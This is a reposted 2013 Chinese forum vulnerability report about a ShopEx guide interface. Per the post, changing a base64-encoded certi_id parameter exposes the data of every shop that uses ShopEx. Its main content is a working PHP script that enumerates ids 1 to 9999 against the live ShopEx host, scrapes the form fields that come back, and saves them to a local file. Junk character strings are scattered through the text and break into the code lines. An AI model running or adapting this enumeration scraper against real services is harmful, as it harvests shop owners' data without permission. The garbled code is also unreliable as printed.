找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2786|回复: 0
打印 上一主题 下一主题

ShopEx某接口缺陷可遍历所有用户网站

[复制链接]
跳转到指定楼层
楼主
发表于 2013-9-21 15:59:47 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:
) A8 `- H; W, c# H/ r2 pShopEx某接口缺陷,可遍历所有网站9 a2 q8 O: i' U' q4 {1 Z, ]8 @
详细说明:
5 v( `2 r$ G. _问题出现在shopex 网店使用向导页面 7 s* T4 {0 z! K; e8 ?2 Z$ f
% R/ `5 N  J3 c9 k" P# h& ~
8 N# H3 _3 a& \

6 a$ }! S$ U% v1 w. j0 lhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=+ B/ Z: M6 w# h4 e
+ |1 Z9 X: L2 F" P8 W0 F
7 f; P$ A5 L* G& Z  Q* J; [
) U. ^# b4 ~% [7 S
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
) j+ T( M2 L# w6 V4 X4 o
9 f! X) N' i# x; J; Q  t0 M3 n, G- a7 u( C

) A1 d. b, {5 @7 G8 Z1 _, Z, N我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 0 U" D% E, B# t' W$ H& E$ u2 o$ `

- g( Z0 j. Z; Z; w! m( Y' e6 E+ i% i: ^( s/ W8 @

. o! q6 z) b. T6 [0 K1 |<?php
! z0 G! ?; j& q
4 N5 R7 n/ F% I0 P: R                for ($i=1; $i < 10000; $i++) { //遍历6 w2 E* L9 K% s3 L- b
( L/ r, m# M& I! X. @  }
                        ShowshopExD($i);
& K' n: g1 z2 f* D4 C9 Q* g9 w" t" X
                }
% C! g" b- o9 ?- P# f0 ~# L1 b! ]; ^! B' u/ Z% K( Q
                function ShowshopExD($cid) {
7 `3 Z$ u' W0 y
8 Z4 K5 w! Q* U$ e* \                $url='http://guide.ecos.shopex.cn/step2.php';0 H7 K  c$ H+ F+ ?

6 M! f( T- E( w! ^# \, y                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');# J! S0 d. q* H. s: @

6 f: B7 j6 w: U( T( w) w        $url = $url.'?refer='.$refer;
) \% T$ Y6 u2 C1 E  W# I
/ ?3 Z5 m2 J( S% c        $ch = curl_init($url);% x  U. K/ @- m4 D, A: ?4 M8 |+ r0 ~
2 E3 q8 t0 n  b( k8 g* W: _+ l& ^
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
7 N# ?7 G! y$ X" l2 }. U" R0 B7 J2 _# `7 j6 ~5 k
        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
% E5 Y' o) y* e9 ^; P, o; u
8 b) y% g. l; h  a& w' p/ r        $result = curl_exec($ch);
0 W9 _9 r' u9 H$ b) \/ L: F1 g
# r# s/ E7 L, w        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
0 h& ^" F& Z9 k: v, \
3 }# J" D; ~$ Q! r* v        if(strpos($result,$refer))
& C3 n0 h6 y& [8 C7 _( }) {/ I1 s3 d+ m9 ^
        {
9 z* U% H$ ^: n/ _+ a4 E; n+ Y# e; `! g! S3 n0 L: W
                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件7 Y% ]5 K5 |8 U% H) e7 H0 V/ [% c
) U8 U' P- e) x  ]' }$ I) ^
                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
5 w' R" C* e6 y$ t$ B0 `3 u
  d0 V) U! A$ [  k4 H' f                foreach ($value[1] as $key) {
8 Z$ G) y: N! ]& ^7 f- n
! Q/ k( @8 T2 e! Z4 N* N                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);0 m: S9 R1 I! h2 {

& }4 k& e& |+ q3 Z) f' j; ]; O                        echo $res[1][0].':'.$res[3][0]."\r\n";
7 S; u! X9 Y, c# F) H( E0 N5 y
* l" n8 R, P5 S, o, e                        $col =$res[1][0].':'.$res[3][0]."\r\n"; & M' O0 N) u; X) J
4 S$ p: j8 Y. P6 t
                        fwrite($fp, $col, strlen($col));
1 g, ]# k8 X+ S3 h7 y, b& K3 `5 F8 E4 U6 z( M
                }
* a/ j4 w2 e1 U5 Z& U7 ^- A( H6 p% o2 I3 W
                echo '--------------------------------'."\r\n";
" m$ k1 K" F1 n" h
' U& Q" H3 V6 T2 ]* ^8 B& R8 ]9 O                fclose($fp); : L! @: \' \2 I, W
9 E7 T! u- ^- c% S4 A9 J: l6 H
        }6 \; ^% V9 O7 l, Y5 d% a
0 T- c, S# m- q, [; e
        flush();# ^( h3 j8 ]( g0 C. t! \

% R1 o  R; v) g3 x$ v7 C        curl_close($ch);/ X  w4 J' h2 [' q) j% h$ i; T

2 F8 x2 E  {3 m7 \  i4 C# R                }2 n' n/ o( @. t
5 z& [, f- d5 o; w  t5 |
?>
* z5 \7 A% b* q" x3 y5 n, S漏洞证明:5 l$ D) [: B7 p
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg; h; k' g$ n* r; I' K! S
refer换成其他加密方式# d' Y/ i2 y+ Q' I; ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表